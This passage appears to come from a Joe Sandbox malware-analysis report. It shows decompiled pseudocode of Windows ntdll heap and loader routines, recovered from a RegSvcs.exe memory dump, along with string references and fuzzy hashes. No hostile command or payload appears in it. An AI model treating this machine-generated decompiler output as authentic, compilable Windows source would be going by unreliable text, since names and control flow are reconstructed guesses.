                                          									}
                                          									_t133 = 0x7ffe038a;
                                          									_t105 =  *( *[fs:0x30] + 0x50);
                                          									__eflags = _t105;
                                          									if(_t105 != 0) {
                                          										__eflags =  *_t105;
                                          										if( *_t105 == 0) {
                                          											goto L16;
                                          										}
                                          										_t106 =  *( *[fs:0x30] + 0x50) + 0x230;
                                          										goto L17;
                                          									} else {
                                          										L16:
                                          										_t106 = _t133;
                                          										L17:
                                          										__eflags =  *_t106;
                                          										if( *_t106 != 0) {
                                          											__eflags = E01317D50();
                                          											if(__eflags != 0) {
                                          												_t133 =  *( *[fs:0x30] + 0x50) + 0x230;
                                          												__eflags =  *( *[fs:0x30] + 0x50) + 0x230;
                                          											}
                                          											E013B1411(_t133, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t133 & 0x000000ff);
                                          										}
                                          										_t75 = _t150[1] & 0x00000013 | 0x00000008;
                                          										_t150[1] = _t75;
                                          										goto L4;
                                          									}
                                          								}
                                          							}
                                          							L10:
                                          							_t97 = _t132;
                                          							goto L11;
                                          						}
                                          					} else {
                                          						goto L4;
                                          					}
                                          				}
                                          			}
                                          0x0132ada6
                                          0x00000000
                                          0x0132ada6
                                          0x0132ad8e
                                          0x0132ad6d
                                          0x0132ad3c
                                          0x0132ad3c
                                          0x00000000
                                          0x0132ad3c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0132acd8

                                          Strings
                                          • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0136A0CD
                                          • HEAP: , xrefs: 0136A0BA
                                          • HEAP[%wZ]: , xrefs: 0136A0AD
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                          • API String ID: 0-1340214556
                                          • Opcode ID: 8d5ffe79afea0cad8c7bc04c30bf61b30b9caca0306296f693712be09bbe97d9
                                          • Instruction ID: d6bf7605f1771dec9e454fc827a2fcd9b9519d5a657babf58ae7952a8a41051b
                                          • Opcode Fuzzy Hash: 8d5ffe79afea0cad8c7bc04c30bf61b30b9caca0306296f693712be09bbe97d9
                                          • Instruction Fuzzy Hash: D4810531204A94EFE726DB6CC894BAABBF8FF05718F0441A5E651DBB92D774E940CB10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 74%
                                          			E0131B73D(void* __ecx, signed int __edx, intOrPtr* _a4, unsigned int _a8, intOrPtr _a12, signed int* _a16) {
                                          				signed int _v8;
                                          				char _v12;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __ebp;
                                          				void* _t72;
                                          				char _t76;
                                          				signed char _t77;
                                          				intOrPtr* _t80;
                                          				unsigned int _t85;
                                          				signed int* _t86;
                                          				signed int _t88;
                                          				signed char _t89;
                                          				intOrPtr _t90;
                                          				intOrPtr _t101;
                                          				intOrPtr* _t111;
                                          				void* _t117;
                                          				intOrPtr* _t118;
                                          				signed int _t120;
                                          				signed char _t121;
                                          				intOrPtr* _t123;
                                          				signed int _t126;
                                          				intOrPtr _t136;
                                          				signed int _t139;
                                          				void* _t140;
                                          				signed int _t141;
                                          				void* _t147;
                                          
                                          				_t111 = _a4;
                                          				_t140 = __ecx;
                                          				_v8 = __edx;
                                          				_t3 = _t111 + 0x18; // 0x0
                                          				 *((intOrPtr*)(_t111 + 0x10)) = _t3;
                                          				_t5 = _t111 - 8; // -32
                                          				_t141 = _t5;
                                          				 *(_t111 + 0x14) = _a8;
                                          				_t72 = 4;
                                          				 *(_t141 + 2) = 1;
                                          				 *_t141 = _t72;
                                          				 *((char*)(_t141 + 7)) = 3;
                                          				_t134 =  *((intOrPtr*)(__edx + 0x18));
                                          				if( *((intOrPtr*)(__edx + 0x18)) != __edx) {
                                          					_t76 = (_t141 - __edx >> 0x10) + 1;
                                          					_v12 = _t76;
                                          					__eflags = _t76 - 0xfe;
                                          					if(_t76 >= 0xfe) {
                                          						_push(__edx);
                                          						_push(0);
                                          						E013BA80D(_t134, 3, _t141, __edx);
                                          						_t76 = _v12;
                                          					}
                                          				} else {
                                          					_t76 = 0;
                                          				}
                                          				 *((char*)(_t141 + 6)) = _t76;
                                          				if( *0x13e8748 >= 1) {
                                          					__eflags = _a12 - _t141;
                                          					if(_a12 <= _t141) {
                                          						goto L4;
                                          					}
                                          					_t101 =  *[fs:0x30];
                                          					__eflags =  *(_t101 + 0xc);
                                          					if( *(_t101 + 0xc) == 0) {
                                          						_push("HEAP: ");
                                          						E012FB150();
                                          					} else {
                                          						E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          					}
                                          					_push("((PHEAP_ENTRY)LastKnownEntry <= Entry)");
                                          					E012FB150();
                                          					__eflags =  *0x13e7bc8;
                                          					if(__eflags == 0) {
                                          						E013B2073(_t111, 1, _t140, __eflags);
                                          					}
                                          					goto L3;
                                          				} else {
                                          					L3:
                                          					_t147 = _a12 - _t141;
                                          					L4:
                                          					if(_t147 != 0) {
                                          						 *((short*)(_t141 + 4)) =  *((intOrPtr*)(_t140 + 0x54));
                                          					}
                                          					if( *((intOrPtr*)(_t140 + 0x4c)) != 0) {
                                          						 *(_t141 + 3) =  *(_t141 + 1) ^  *(_t141 + 2) ^  *_t141;
                                          						 *_t141 =  *_t141 ^  *(_t140 + 0x50);
                                          					}
                                          					_t135 =  *(_t111 + 0x14);
                                          					if( *(_t111 + 0x14) == 0) {
                                          						L12:
                                          						_t77 =  *((intOrPtr*)(_t141 + 6));
                                          						if(_t77 != 0) {
                                          							_t117 = (_t141 & 0xffff0000) - ((_t77 & 0x000000ff) << 0x10) + 0x10000;
                                          						} else {
                                          							_t117 = _t140;
                                          						}
                                          						_t118 = _t117 + 0x38;
                                          						_t26 = _t111 + 8; // -16
                                          						_t80 = _t26;
                                          						_t136 =  *_t118;
                                          						if( *((intOrPtr*)(_t136 + 4)) != _t118) {
                                          							_push(_t118);
                                          							_push(0);
                                          							E013BA80D(0, 0xd, _t118,  *((intOrPtr*)(_t136 + 4)));
                                          						} else {
                                          							 *_t80 = _t136;
                                          							 *((intOrPtr*)(_t80 + 4)) = _t118;
                                          							 *((intOrPtr*)(_t136 + 4)) = _t80;
                                          							 *_t118 = _t80;
                                          						}
                                          						_t120 = _v8;
                                          						 *((intOrPtr*)(_t120 + 0x30)) =  *((intOrPtr*)(_t120 + 0x30)) + 1;
                                          						 *((intOrPtr*)(_t120 + 0x2c)) =  *((intOrPtr*)(_t120 + 0x2c)) + ( *(_t111 + 0x14) >> 0xc);
                                          						 *((intOrPtr*)(_t140 + 0x1e8)) =  *((intOrPtr*)(_t140 + 0x1e8)) -  *(_t111 + 0x14);
                                          						 *((intOrPtr*)(_t140 + 0x1f8)) =  *((intOrPtr*)(_t140 + 0x1f8)) + 1;
                                          						if( *((intOrPtr*)(_t140 + 0x1f8)) > 0xa) {
                                          							__eflags =  *(_t140 + 0xb8);
                                          							if( *(_t140 + 0xb8) == 0) {
                                          								_t88 =  *(_t140 + 0x40) & 0x00000003;
                                          								__eflags = _t88 - 2;
                                          								_t121 = _t120 & 0xffffff00 | _t88 == 0x00000002;
                                          								__eflags =  *0x13e8720 & 0x00000001;
                                          								_t89 = _t88 & 0xffffff00 | ( *0x13e8720 & 0x00000001) == 0x00000000;
                                          								__eflags = _t89 & _t121;
                                          								if((_t89 & _t121) != 0) {
                                          									 *(_t140 + 0x48) =  *(_t140 + 0x48) | 0x10000000;
                                          								}
                                          							}
                                          						}
                                          						_t85 =  *(_t111 + 0x14);
                                          						if(_t85 >= 0x7f000) {
                                          							 *((intOrPtr*)(_t140 + 0x1ec)) =  *((intOrPtr*)(_t140 + 0x1ec)) + _t85;
                                          						}
                                          						_t86 = _a16;
                                          						 *_t86 = _t141 - _a12 >> 3;
                                          						return _t86;
                                          					} else {
                                          						_t90 = E0131B8E4(_t135);
                                          						_t123 =  *((intOrPtr*)(_t90 + 4));
                                          						if( *_t123 != _t90) {
                                          							_push(_t123);
                                          							_push( *_t123);
                                          							E013BA80D(0, 0xd, _t90, 0);
                                          						} else {
                                          							 *_t111 = _t90;
                                          							 *((intOrPtr*)(_t111 + 4)) = _t123;
                                          							 *_t123 = _t111;
                                          							 *((intOrPtr*)(_t90 + 4)) = _t111;
                                          						}
                                          						_t139 =  *(_t140 + 0xb8);
                                          						if(_t139 != 0) {
                                          							_t93 =  *(_t111 + 0x14) >> 0xc;
                                          							__eflags = _t93;
                                          							while(1) {
                                          								__eflags = _t93 -  *((intOrPtr*)(_t139 + 4));
                                          								if(_t93 <  *((intOrPtr*)(_t139 + 4))) {
                                          									break;
                                          								}
                                          								_t126 =  *_t139;
                                          								__eflags = _t126;
                                          								if(_t126 != 0) {
                                          									_t139 = _t126;
                                          									continue;
                                          								}
                                          								_t93 =  *((intOrPtr*)(_t139 + 4)) - 1;
                                          								__eflags =  *((intOrPtr*)(_t139 + 4)) - 1;
                                          								break;
                                          							}
                                          							E0131E4A0(_t140, _t139, 0, _t111, _t93,  *(_t111 + 0x14));
                                          						}
                                          						goto L12;
                                          					}
                                          				}
                                          			}

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-1334570610
                                          • Opcode ID: 249479818377debb4ff128afdc10abb03de94c9cdb8f3b2a0e45c7f548a6378c
                                          • Instruction ID: 747c047b5e2fe30b50742a6b2ccb9c56bd0843afff0c6dadf7478b9c43c64cce
                                          • Opcode Fuzzy Hash: 249479818377debb4ff128afdc10abb03de94c9cdb8f3b2a0e45c7f548a6378c
                                          • Instruction Fuzzy Hash: F761AC706002459FDB2DCF28C484B6AFBF5FF04718F18856EE8498B65AD730E891CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 98%
                                          			E01307E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                          				char _v8;
                                          				intOrPtr _v12;
                                          				intOrPtr _v16;
                                          				intOrPtr _v20;
                                          				char _v24;
                                          				signed int _t73;
                                          				void* _t77;
                                          				char* _t82;
                                          				char* _t87;
                                          				signed char* _t97;
                                          				signed char _t102;
                                          				intOrPtr _t107;
                                          				signed char* _t108;
                                          				intOrPtr _t112;
                                          				intOrPtr _t124;
                                          				intOrPtr _t125;
                                          				intOrPtr _t126;
                                          
                                          				_t107 = __edx;
                                          				_v12 = __ecx;
                                          				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                                          				_t124 = 0;
                                          				_v20 = __edx;
                                          				if(E0130CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                                          					_t112 = _v8;
                                          				} else {
                                          					_t112 = 0;
                                          					_v8 = 0;
                                          				}
                                          				if(_t112 != 0) {
                                          					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                                          						_t124 = 0xc000007b;
                                          						goto L8;
                                          					}
                                          					_t73 =  *(_t125 + 0x34) | 0x00400000;
                                          					 *(_t125 + 0x34) = _t73;
                                          					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                                          						goto L3;
                                          					}
                                          					 *(_t125 + 0x34) = _t73 | 0x01000000;
                                          					_t124 = E012FC9A4( *((intOrPtr*)(_t125 + 0x18)));
                                          					if(_t124 < 0) {
                                          						goto L8;
                                          					} else {
                                          						goto L3;
                                          					}
                                          				} else {
                                          					L3:
                                          					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                                          						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                                          						L8:
                                          						return _t124;
                                          					}
                                          					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                                          						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                                          							goto L5;
                                          						}
                                          						_t102 =  *0x13e5780; // 0x0
                                          						if((_t102 & 0x00000003) != 0) {
                                          							E01375510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                                          							_t102 =  *0x13e5780; // 0x0
                                          						}
                                          						if((_t102 & 0x00000010) != 0) {
                                          							asm("int3");
                                          						}
                                          						_t124 = 0xc0000428;
                                          						goto L8;
                                          					}
                                          					L5:
                                          					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                                          						goto L8;
                                          					}
                                          					_t77 = _a4 - 0x40000003;
                                          					if(_t77 == 0 || _t77 == 0x33) {
                                          						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                                          						if(E01317D50() != 0) {
                                          							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                          						} else {
                                          							_t82 = 0x7ffe0384;
                                          						}
                                          						_t108 = 0x7ffe0385;
                                          						if( *_t82 != 0) {
                                          							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                          								if(E01317D50() == 0) {
                                          									_t97 = 0x7ffe0385;
                                          								} else {
                                          									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                          								}
                                          								if(( *_t97 & 0x00000020) != 0) {
                                          									E01377016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                                          								}
                                          							}
                                          						}
                                          						if(_a4 != 0x40000003) {
                                          							L14:
                                          							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                                          							if(E01317D50() != 0) {
                                          								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                          							} else {
                                          								_t87 = 0x7ffe0384;
                                          							}
                                          							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                          								if(E01317D50() != 0) {
                                          									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                          								}
                                          								if(( *_t108 & 0x00000020) != 0) {
                                          									E01377016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                                          								}
                                          							}
                                          							goto L8;
                                          						} else {
                                          							_v16 = _t125 + 0x24;
                                          							_t124 = E0132A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                                          							if(_t124 < 0) {
                                          								E012FB1E1(_t124, 0x1490, 0, _v16);
                                          								goto L8;
                                          							}
                                          							goto L14;
                                          						}
                                          					} else {
                                          						goto L8;
                                          					}
                                          				}
                                          			}

                                          Strings
                                          • Could not validate the crypto signature for DLL %wZ, xrefs: 01359891
                                          • minkernel\ntdll\ldrmap.c, xrefs: 013598A2
                                          • LdrpCompleteMapModule, xrefs: 01359898
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                          • API String ID: 0-1676968949
                                          • Opcode ID: 6f23a4eff4dc34dc57231fb050b9bdfc42cd234458e42cd320fac9a63a2d20df
                                          • Instruction ID: 6933552b9c0438fa202d6952a071ddb70ca1a958750a084a8601e14414a96282
                                          • Opcode Fuzzy Hash: 6f23a4eff4dc34dc57231fb050b9bdfc42cd234458e42cd320fac9a63a2d20df
                                          • Instruction Fuzzy Hash: C451F13160174ADBEB22CB6CC954F2ABBE8AB0071CF1406A9E9959B7D2D774FD00C791
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 64%
                                          			E013A23E3(signed int __ecx, unsigned int __edx) {
                                          				intOrPtr _v8;
                                          				intOrPtr _t42;
                                          				char _t43;
                                          				signed short _t44;
                                          				signed short _t48;
                                          				signed char _t51;
                                          				signed short _t52;
                                          				intOrPtr _t54;
                                          				signed short _t64;
                                          				signed short _t66;
                                          				intOrPtr _t69;
                                          				signed short _t73;
                                          				signed short _t76;
                                          				signed short _t77;
                                          				signed short _t79;
                                          				void* _t83;
                                          				signed int _t84;
                                          				signed int _t85;
                                          				signed char _t94;
                                          				unsigned int _t99;
                                          				unsigned int _t104;
                                          				signed int _t108;
                                          				void* _t110;
                                          				void* _t111;
                                          				unsigned int _t114;
                                          
                                          				_t84 = __ecx;
                                          				_push(__ecx);
                                          				_t114 = __edx;
                                          				_t42 =  *((intOrPtr*)(__edx + 7));
                                          				if(_t42 == 1) {
                                          					L49:
                                          					_t43 = 1;
                                          					L50:
                                          					return _t43;
                                          				}
                                          				if(_t42 != 4) {
                                          					if(_t42 >= 0) {
                                          						if( *(__ecx + 0x4c) == 0) {
                                          							_t44 =  *__edx & 0x0000ffff;
                                          						} else {
                                          							_t73 =  *__edx;
                                          							if(( *(__ecx + 0x4c) & _t73) != 0) {
                                          								_t73 = _t73 ^  *(__ecx + 0x50);
                                          							}
                                          							_t44 = _t73 & 0x0000ffff;
                                          						}
                                          					} else {
                                          						_t104 = __edx >> 0x00000003 ^  *__edx ^  *0x13e874c ^ __ecx;
                                          						if(_t104 == 0) {
                                          							_t76 =  *((intOrPtr*)(__edx - (_t104 >> 0xd)));
                                          						} else {
                                          							_t76 = 0;
                                          						}
                                          						_t44 =  *((intOrPtr*)(_t76 + 0x14));
                                          					}
                                          					_t94 =  *((intOrPtr*)(_t114 + 7));
                                          					_t108 = _t44 & 0xffff;
                                          					if(_t94 != 5) {
                                          						if((_t94 & 0x00000040) == 0) {
                                          							if((_t94 & 0x0000003f) == 0x3f) {
                                          								if(_t94 >= 0) {
                                          									if( *(_t84 + 0x4c) == 0) {
                                          										_t48 =  *_t114 & 0x0000ffff;
                                          									} else {
                                          										_t66 =  *_t114;
                                          										if(( *(_t84 + 0x4c) & _t66) != 0) {
                                          											_t66 = _t66 ^  *(_t84 + 0x50);
                                          										}
                                          										_t48 = _t66 & 0x0000ffff;
                                          									}
                                          								} else {
                                          									_t99 = _t114 >> 0x00000003 ^  *_t114 ^  *0x13e874c ^ _t84;
                                          									if(_t99 == 0) {
                                          										_t69 =  *((intOrPtr*)(_t114 - (_t99 >> 0xd)));
                                          									} else {
                                          										_t69 = 0;
                                          									}
                                          									_t48 =  *((intOrPtr*)(_t69 + 0x14));
                                          								}
                                          								_t85 =  *(_t114 + (_t48 & 0xffff) * 8 - 4);
                                          							} else {
                                          								_t85 = _t94 & 0x3f;
                                          							}
                                          						} else {
                                          							_t85 =  *(_t114 + 4 + (_t94 & 0x3f) * 8) & 0x0000ffff;
                                          						}
                                          					} else {
                                          						_t85 =  *(_t84 + 0x54) & 0x0000ffff ^  *(_t114 + 4) & 0x0000ffff;
                                          					}
                                          					_t110 = (_t108 << 3) - _t85;
                                          				} else {
                                          					if( *(__ecx + 0x4c) == 0) {
                                          						_t77 =  *__edx & 0x0000ffff;
                                          					} else {
                                          						_t79 =  *__edx;
                                          						if(( *(__ecx + 0x4c) & _t79) != 0) {
                                          							_t79 = _t79 ^  *(__ecx + 0x50);
                                          						}
                                          						_t77 = _t79 & 0x0000ffff;
                                          					}
                                          					_t110 =  *((intOrPtr*)(_t114 - 8)) - (_t77 & 0x0000ffff);
                                          				}
                                          				_t51 =  *((intOrPtr*)(_t114 + 7));
                                          				if(_t51 != 5) {
                                          					if((_t51 & 0x00000040) == 0) {
                                          						_t52 = 0;
                                          						goto L42;
                                          					}
                                          					_t64 = _t51 & 0x3f;
                                          					goto L38;
                                          				} else {
                                          					_t64 =  *(_t114 + 6) & 0x000000ff;
                                          					L38:
                                          					_t52 = _t64 << 0x00000003 & 0x0000ffff;
                                          					L42:
                                          					_t35 = _t114 + 8; // -16
                                          					_t111 = _t110 + (_t52 & 0x0000ffff);
                                          					_t83 = _t35 + _t111;
                                          					_t54 = E0134D4F0(_t83, 0x12d6c58, 8);
                                          					_v8 = _t54;
                                          					if(_t54 == 8) {
                                          						goto L49;
                                          					}
                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                          						_push("HEAP: ");
                                          						E012FB150();
                                          					} else {
                                          						E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          					}
                                          					_push(_t111);
                                          					_push(_v8 + _t83);
                                          					E012FB150("Heap block at %p modified at %p past requested size of %Ix\n", _t114);
                                          					if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                          						 *0x13e6378 = 1;
                                          						asm("int3");
                                          						 *0x13e6378 = 0;
                                          					}
                                          					_t43 = 0;
                                          					goto L50;
                                          				}
                                          			}

                                          Strings
                                          • Heap block at %p modified at %p past requested size of %Ix, xrefs: 013A256F
                                          • HEAP: , xrefs: 013A255C
                                          • HEAP[%wZ]: , xrefs: 013A254F
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                          • API String ID: 0-3815128232
                                          • Opcode ID: 60322b16f9c00925790da55f67c019876eb3a9e39e9760fa8c5ee215671a129c
                                          • Instruction ID: 6d891c74c817b942070a17dda9a31c41af09e6dc66146d0949535292c389282b
                                          • Opcode Fuzzy Hash: 60322b16f9c00925790da55f67c019876eb3a9e39e9760fa8c5ee215671a129c
                                          • Instruction Fuzzy Hash: 93512434110264CAE374CE2EC8447B3BBF6EB5864CFD5489DE9C29B685D239D847DB20
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 93%
                                          			E012FE620(void* __ecx, short* __edx, short* _a4) {
                                          				char _v16;
                                          				char _v20;
                                          				intOrPtr _v24;
                                          				char* _v28;
                                          				char _v32;
                                          				char _v36;
                                          				char _v44;
                                          				signed int _v48;
                                          				intOrPtr _v52;
                                          				void* _v56;
                                          				void* _v60;
                                          				char _v64;
                                          				void* _v68;
                                          				void* _v76;
                                          				void* _v84;
                                          				signed int _t59;
                                          				signed int _t74;
                                          				signed short* _t75;
                                          				signed int _t76;
                                          				signed short* _t78;
                                          				signed int _t83;
                                          				short* _t93;
                                          				signed short* _t94;
                                          				short* _t96;
                                          				void* _t97;
                                          				signed int _t99;
                                          				void* _t101;
                                          				void* _t102;
                                          
                                          				_t80 = __ecx;
                                          				_t101 = (_t99 & 0xfffffff8) - 0x34;
                                          				_t96 = __edx;
                                          				_v44 = __edx;
                                          				_t78 = 0;
                                          				_v56 = 0;
                                          				if(__ecx == 0 || __edx == 0) {
                                          					L28:
                                          					_t97 = 0xc000000d;
                                          				} else {
                                          					_t93 = _a4;
                                          					if(_t93 == 0) {
                                          						goto L28;
                                          					}
                                          					_t78 = E012FF358(__ecx, 0xac);
                                          					if(_t78 == 0) {
                                          						_t97 = 0xc0000017;
                                          						L6:
                                          						if(_v56 != 0) {
                                          							_push(_v56);
                                          							E013395D0();
                                          						}
                                          						if(_t78 != 0) {
                                          							L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                                          						}
                                          						return _t97;
                                          					}
                                          					E0133FA60(_t78, 0, 0x158);
                                          					_v48 = _v48 & 0x00000000;
                                          					_t102 = _t101 + 0xc;
                                          					 *_t96 = 0;
                                          					 *_t93 = 0;
                                          					E0133BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                                          					_v36 = 0x18;
                                          					_v28 =  &_v44;
                                          					_v64 = 0;
                                          					_push( &_v36);
                                          					_push(0x20019);
                                          					_v32 = 0;
                                          					_push( &_v64);
                                          					_v24 = 0x40;
                                          					_v20 = 0;
                                          					_v16 = 0;
                                          					_t97 = E01339600();
                                          					if(_t97 < 0) {
                                          						goto L6;
                                          					}
                                          					E0133BB40(0,  &_v36, L"InstallLanguageFallback");
                                          					_push(0);
                                          					_v48 = 4;
                                          					_t97 = L012FF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                                          					if(_t97 >= 0) {
                                          						if(_v52 != 1) {
                                          							L17:
                                          							_t97 = 0xc0000001;
                                          							goto L6;
                                          						}
                                          						_t59 =  *_t78 & 0x0000ffff;
                                          						_t94 = _t78;
                                          						_t83 = _t59;
                                          						if(_t59 == 0) {
                                          							L19:
                                          							if(_t83 == 0) {
                                          								L23:
                                          								E0133BB40(_t83, _t102 + 0x24, _t78);
                                          								if(L013043C0( &_v48,  &_v64) == 0) {
                                          									goto L17;
                                          								}
                                          								_t84 = _v48;
                                          								 *_v48 = _v56;
                                          								if( *_t94 != 0) {
                                          									E0133BB40(_t84, _t102 + 0x24, _t94);
                                          									if(L013043C0( &_v48,  &_v64) != 0) {
                                          										 *_a4 = _v56;
                                          									} else {
                                          										_t97 = 0xc0000001;
                                          										 *_v48 = 0;
                                          									}
                                          								}
                                          								goto L6;
                                          							}
                                          							_t83 = _t83 & 0x0000ffff;
                                          							while(_t83 == 0x20) {
                                          								_t94 =  &(_t94[1]);
                                          								_t74 =  *_t94 & 0x0000ffff;
                                          								_t83 = _t74;
                                          								if(_t74 != 0) {
                                          									continue;
                                          								}
                                          								goto L23;
                                          							}
                                          							goto L23;
                                          						} else {
                                          							goto L14;
                                          						}
                                          						while(1) {
                                          							L14:
                                          							_t27 =  &(_t94[1]); // 0x2
                                          							_t75 = _t27;
                                          							if(_t83 == 0x2c) {
                                          								break;
                                          							}
                                          							_t94 = _t75;
                                          							_t76 =  *_t94 & 0x0000ffff;
                                          							_t83 = _t76;
                                          							if(_t76 != 0) {
                                          								continue;
                                          							}
                                          							goto L23;
                                          						}
                                          						 *_t94 = 0;
                                          						_t94 = _t75;
                                          						_t83 =  *_t75 & 0x0000ffff;
                                          						goto L19;
                                          					}
                                          				}
                                          			}
































                                          Strings
                                          • @, xrefs: 012FE6C0
                                          • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 012FE68C
                                          • InstallLanguageFallback, xrefs: 012FE6DB
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                          • API String ID: 0-1757540487
                                          • Opcode ID: 3a65e01dd1d5344fe1695f7e8456349ab6f253a12bdf6de917a4270296809673
                                          • Instruction ID: 3c9911914ff2b8f0d7ac524ef9172fc0e5fd76b729409cfb21d00a40bc57ca2e
                                          • Opcode Fuzzy Hash: 3a65e01dd1d5344fe1695f7e8456349ab6f253a12bdf6de917a4270296809673
                                          • Instruction Fuzzy Hash: E951D6B25143469BD715DF68C440E6BB7E8BF88618F05092EFA85E7250FB34D904C792
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 60%
                                          			E0131B8E4(unsigned int __edx) {
                                          				void* __ecx;
                                          				void* __edi;
                                          				intOrPtr* _t16;
                                          				intOrPtr _t18;
                                          				void* _t27;
                                          				void* _t28;
                                          				unsigned int _t30;
                                          				intOrPtr* _t31;
                                          				unsigned int _t38;
                                          				void* _t39;
                                          				unsigned int _t40;
                                          
                                          				_t40 = __edx;
                                          				_t39 = _t28;
                                          				if( *0x13e8748 >= 1) {
                                          					__eflags = (__edx + 0x00000fff & 0xfffff000) - __edx;
                                          					if((__edx + 0x00000fff & 0xfffff000) != __edx) {
                                          						_t18 =  *[fs:0x30];
                                          						__eflags =  *(_t18 + 0xc);
                                          						if( *(_t18 + 0xc) == 0) {
                                          							_push("HEAP: ");
                                          							E012FB150();
                                          						} else {
                                          							E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          						}
